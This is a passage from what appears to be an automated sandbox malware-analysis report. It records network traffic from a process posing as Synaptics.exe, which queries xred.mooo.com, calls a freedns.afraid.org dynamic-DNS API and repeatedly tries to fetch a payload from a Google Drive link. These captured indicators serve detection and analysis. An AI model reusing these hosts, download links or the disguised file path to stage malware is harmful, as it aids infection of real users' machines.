                                                                                                            Nov 15, 2024 11:24:37.365261078 CET5975953192.168.2.161.1.1.1
                                                                                                            Nov 15, 2024 11:24:37.373271942 CET53597591.1.1.1192.168.2.16
                                                                                                            Nov 15, 2024 11:24:37.376374006 CET6184153192.168.2.161.1.1.1
                                                                                                            Nov 15, 2024 11:24:37.484783888 CET53618411.1.1.1192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.953967094 CET5712853192.168.2.161.1.1.1
                                                                                                            Nov 15, 2024 11:24:43.962208033 CET53571281.1.1.1192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.467972994 CET5098653192.168.2.161.1.1.1
                                                                                                            Nov 15, 2024 11:24:48.475939989 CET53509861.1.1.1192.168.2.16
                                                                                                            Nov 15, 2024 11:24:54.158221960 CET5287253192.168.2.161.1.1.1
                                                                                                            Nov 15, 2024 11:24:54.165884018 CET53528721.1.1.1192.168.2.16
                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Nov 15, 2024 11:23:34.683109045 CET192.168.2.161.1.1.10x3dedStandard query (0)docs.google.comA (IP address)IN (0x0001)false
                                                                                                            Nov 15, 2024 11:23:35.561999083 CET192.168.2.161.1.1.10xcafaStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                            Nov 15, 2024 11:23:35.575030088 CET192.168.2.161.1.1.10x51b7Standard query (0)freedns.afraid.orgA (IP address)IN (0x0001)false
                                                                                                            Nov 15, 2024 11:23:35.974428892 CET192.168.2.161.1.1.10xf795Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                            Nov 15, 2024 11:23:41.946686029 CET192.168.2.161.1.1.10x16d0Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                            Nov 15, 2024 11:23:46.594997883 CET192.168.2.161.1.1.10x4bebStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                            Nov 15, 2024 11:24:36.520792007 CET192.168.2.161.1.1.10xe60eStandard query (0)docs.google.comA (IP address)IN (0x0001)false
                                                                                                            Nov 15, 2024 11:24:37.365261078 CET192.168.2.161.1.1.10xc155Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                            Nov 15, 2024 11:24:37.376374006 CET192.168.2.161.1.1.10xb0c5Standard query (0)freedns.afraid.orgA (IP address)IN (0x0001)false
                                                                                                            Nov 15, 2024 11:24:43.953967094 CET192.168.2.161.1.1.10xab4bStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                            Nov 15, 2024 11:24:48.467972994 CET192.168.2.161.1.1.10x529fStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                            Nov 15, 2024 11:24:54.158221960 CET192.168.2.161.1.1.10xc61bStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Nov 15, 2024 11:23:34.690319061 CET1.1.1.1192.168.2.160x3dedNo error (0)docs.google.com142.250.186.78A (IP address)IN (0x0001)false
                                                                                                            Nov 15, 2024 11:23:35.569880009 CET1.1.1.1192.168.2.160xcafaName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                            Nov 15, 2024 11:23:35.583574057 CET1.1.1.1192.168.2.160x51b7No error (0)freedns.afraid.org69.42.215.252A (IP address)IN (0x0001)false
                                                                                                            Nov 15, 2024 11:23:35.981528997 CET1.1.1.1192.168.2.160xf795No error (0)drive.usercontent.google.com142.250.185.65A (IP address)IN (0x0001)false
                                                                                                            Nov 15, 2024 11:23:42.092784882 CET1.1.1.1192.168.2.160x16d0Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                            Nov 15, 2024 11:23:46.602283001 CET1.1.1.1192.168.2.160x4bebName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                            Nov 15, 2024 11:24:36.527861118 CET1.1.1.1192.168.2.160xe60eNo error (0)docs.google.com142.250.185.78A (IP address)IN (0x0001)false
                                                                                                            Nov 15, 2024 11:24:37.373271942 CET1.1.1.1192.168.2.160xc155Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                            Nov 15, 2024 11:24:37.484783888 CET1.1.1.1192.168.2.160xb0c5No error (0)freedns.afraid.org69.42.215.252A (IP address)IN (0x0001)false
                                                                                                            Nov 15, 2024 11:24:39.809583902 CET1.1.1.1192.168.2.160x867No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                            Nov 15, 2024 11:24:39.809583902 CET1.1.1.1192.168.2.160x867No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                            Nov 15, 2024 11:24:43.962208033 CET1.1.1.1192.168.2.160xab4bName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                            Nov 15, 2024 11:24:48.475939989 CET1.1.1.1192.168.2.160x529fName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                            Nov 15, 2024 11:24:54.165884018 CET1.1.1.1192.168.2.160xc61bName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                            • docs.google.com
                                                                                                            • drive.usercontent.google.com
                                                                                                            • otelrules.azureedge.net
                                                                                                            • freedns.afraid.org
                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.164971169.42.215.252803588C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 15, 2024 11:23:35.589334011 CET154OUTGET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                                            User-Agent: MyApp
                                                                                                            Host: freedns.afraid.org
                                                                                                            Cache-Control: no-cache
                                                                                                            Nov 15, 2024 11:23:36.267127991 CET243INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Fri, 15 Nov 2024 10:23:36 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: keep-alive
                                                                                                            Vary: Accept-Encoding
                                                                                                            X-Cache: MISS
                                                                                                            Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 1fERROR: Could not authenticate.0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.164977169.42.215.252806056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 15, 2024 11:24:37.490979910 CET154OUTGET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                                            User-Agent: MyApp
                                                                                                            Host: freedns.afraid.org
                                                                                                            Cache-Control: no-cache
                                                                                                            Nov 15, 2024 11:24:38.184916973 CET243INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Fri, 15 Nov 2024 10:24:38 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: keep-alive
                                                                                                            Vary: Accept-Encoding
                                                                                                            X-Cache: MISS
                                                                                                            Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 1fERROR: Could not authenticate.0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.1649708142.250.186.784433588C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:23:35 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            2024-11-15 10:23:35 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:23:35 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-QUoyw-SYRefUaXLh28c_Qg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.1649709142.250.186.784433588C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:23:35 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            2024-11-15 10:23:36 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:23:35 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-5_QOBuhjeozmoelHqGvsmA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.1649712142.250.186.784433588C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:23:36 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            2024-11-15 10:23:37 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:23:37 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-W-AOprcT7p_Pbn3qqxBdxA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.1649713142.250.185.654433588C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:23:36 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-15 10:23:37 UTC1604INHTTP/1.1 404 Not Found
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:23:37 GMT
                                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-ZBjK20AS9MKuj5nNqCSh8g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Content-Length: 1652
                                                                                                            X-GUploader-UploadID: AHmUCY0ewsfPUJAJfYy5i9ywgFg1OYiYr7jtRJg_COrKbqwA3JdY20BFdNn7iBKglKyNFbWckvhUnvcPRw
                                                                                                            Server: UploadServer
                                                                                                            Set-Cookie: NID=519=N9IVbbi_ybLPlL5Ktyomp8O37RR9rhONV7JOpGGGH3MJvuEsW8uL6tAxek_47v5zGYQH0cEaxH2NJH4IYHq-qBw05DF44ia6B50eYng5_PfBZLi1AKtMZPje_9RzC4hJ-lUNz755i8_9aooWMtjFNO3EzyN5FXjyG1fZd5oVw0XASIDEOIZYaVQ; expires=Sat, 17-May-2025 10:23:37 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                            Connection: close
                                                                                                            2024-11-15 10:23:37 UTC1604INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 47 39 57 6e 70 46 76 65 4a 33 46 4e 65 47 56 46 78 4a 67 37 67 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="G9WnpFveJ3FNeGVFxJg7gQ">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                            2024-11-15 10:23:37 UTC48INData Raw: 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                            Data Ascii: server. <ins>Thats all we know.</ins></main>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.1649715142.250.185.654433588C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:23:36 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-15 10:23:37 UTC1605INHTTP/1.1 404 Not Found
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:23:37 GMT
                                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-nTAq9O8OHHH-Y6TnIKwMvA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Content-Length: 1652
                                                                                                            X-GUploader-UploadID: AHmUCY2fW3bYTSVwIHWWemZ939OGliQeUXi8HENLYOyY9pdIlHwjbNbCYmIrrxznO7L0AOshtfrl8rhCNw
                                                                                                            Server: UploadServer
                                                                                                            Set-Cookie: NID=519=SEIp9Ft1pM_DTSp4ZWAE2JXd5p6vYnOenYasNDVud7Yu6_XlLVZWsdgqTMAV0WJp8gbHLzac7m-O074jzZozfmgMpTLCdPEbll-92cpDhan5otbZ5vTSOiiwCIw1pFCy9i0rkRERXyoZZbduoCGvMnLGpGFYBf-d6w_ZXbzQtTOeATiGU0dEJLQO; expires=Sat, 17-May-2025 10:23:37 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                            Connection: close
                                                                                                            2024-11-15 10:23:37 UTC1605INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 63 4a 53 73 52 55 7a 68 54 66 52 5f 32 36 73 70 72 71 66 75 75 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="cJSsRUzhTfR_26sprqfuuw">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                            2024-11-15 10:23:37 UTC47INData Raw: 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                            Data Ascii: server. <ins>Thats all we know.</ins></main>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.2.1649714142.250.186.784433588C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:23:36 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            2024-11-15 10:23:37 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:23:37 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-KP04WmiwJAAWjfxFzXnhxg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            6192.168.2.1649719142.250.186.784433588C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:23:38 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            2024-11-15 10:23:38 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:23:38 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-x7d1QdRDcDPCBoErUgzxjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            7192.168.2.1649720142.250.186.784433588C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:23:38 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            2024-11-15 10:23:38 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:23:38 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
